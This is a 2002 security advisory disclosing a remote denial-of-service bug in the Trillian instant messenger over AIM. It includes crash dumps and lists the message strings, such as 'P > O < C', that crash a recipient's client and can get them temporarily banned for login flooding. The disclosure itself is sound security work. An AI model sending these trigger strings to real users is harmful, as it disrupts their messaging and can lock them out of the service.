Advisory Url: http://www.computersecuritynow.com/modules.php?op=modload&name=News&file=article&sid=817&mode=thread&order=0&thold=0 ######################################################## # ComputerSecurityNow Advisory Sep 23 2002 # Trillian Remote DoS Attack - AIM # # Spikeman - spikeman at computersecuritynow dot com # http://www.computersecuritynow.com/ ######## # # Thanks to Mith(www.derisive.net) for debugging dump # logs and being a test subject. # Background on Trillian Trillian allows you to Connect to ICQ, AIM, MSN Messenger, Yahoo! Messenger and IRC in a single application. Vulnerable Applications Trillian .73 and .74 were tested unknown of 1.0 pro or any earlier versions. Tested on Win98/ME/2k/NT 4 While using AOL AIM services. Tested MSN Messenger and it is unaffected. Tested ICQ and it is unaffected. Impact Trillian crashes and you have to restart. Bonus is if you keep crashing the person, AIM services will ban them for login flooding (Timed Ban). Dumps when Trillian crashes. 1] The instruction at "0x022160df" referenced memory at "0x2228aa2c". The memory could not be "read". 2] Unhandled exception in trillian.exe (TALK.DLL): 0xC0000005: Access Violation. 3] 022160DF mov ecx,dword ptr [ebx+edx] 4] TRILLIAN caused an invalid page fault in module TALK.DLL at 0167:017660df. Registers: EAX=017a0078 CS=0167 EIP=017660df EFLGS=00010216 EBX=1fffffff SS=016f ESP=006a9580 EBP=006a95a0 ECX=017a11dc DS=016f ESI=00000008 FS=2a3f EDX=018f01dd ES=016f EDI=31000001 GS=2a67 Bytes at CS:EIP: 8b 0c 13 f6 c1 01 89 4d f8 75 7f c1 f9 04 6a 3f Stack dump: 018f1af2 018f01e1 00000066 bff7b99f 017a11dc 1fffffff 01765f71 31000001 018f1ac0 01762783 018a000c 018f01e1 018f01e1 0172e142 018f01e1 018f0210 ######################### # Offending Data String # ######################### Send a AOL IM to someone with this string anywhere in the message (the spaces must be there) P > O < C And it will cause the application to crash. Other data strings do work IE ee > 3e < 3dsaf 3 > 3 < 3 computer > security < now ############## # Extra Data # ############## This is a remote DoS only, sending from Trillian will not crash the local client. I have found out that not all data strings work such as e > e < i will send through and post e > e Could this be an html parsing issue? i (italic) b (bold) and u (underline) all do the same as above but of you add another > everything after word will be the tag given. String sent test > test < i > everything comes in italics String came through test > test everything comes in italics -------------^ italics starts here. -- ___ /\ \ Freedom is the right to grow, is the right to blossom, /::\ \ /:/\:\ \ _\:\~\:\ \ /\ \:\ \:\__\ Spikeman \:\ \:\ \/__/ http://www.spikeman.net \:\ \:\__\ http://www.computersecuritynow.com \:\/:/ / \::/ / Freedom is the right to be yourself, to be who you \/__/ are, to be who you wanna be, to do what you wanna do.
